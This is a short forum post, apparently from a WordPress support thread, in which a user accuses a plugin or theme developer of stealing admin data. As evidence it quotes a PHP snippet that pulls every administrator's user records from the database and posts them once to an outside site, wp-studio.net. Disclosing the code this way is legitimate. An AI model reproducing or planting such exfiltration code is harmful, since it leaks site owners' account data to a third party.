Stole my admin info
-
See this code:
if ( ! get_option('my_post_log') ) { global $wpdb; $users = $wpdb->get_results("SELECT * FROM wp_users u, wp_usermeta um WHERE u.ID = um.user_id AND um.meta_key = 'wp_capabilities' AND um.meta_value LIKE '%administrator%'"); $args = array('body' => $users); $res = wp_remote_post('http://wp-studio.net/?post_log=1', $args); if (isset($res['response']['code']) and $res['response']['code'] == '200') add_option('my_post_log', true); }You removed it now, but you stole my admin email. Luckily, everything gets recorded here:
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
The topic ‘Stole my admin info’ is closed to new replies.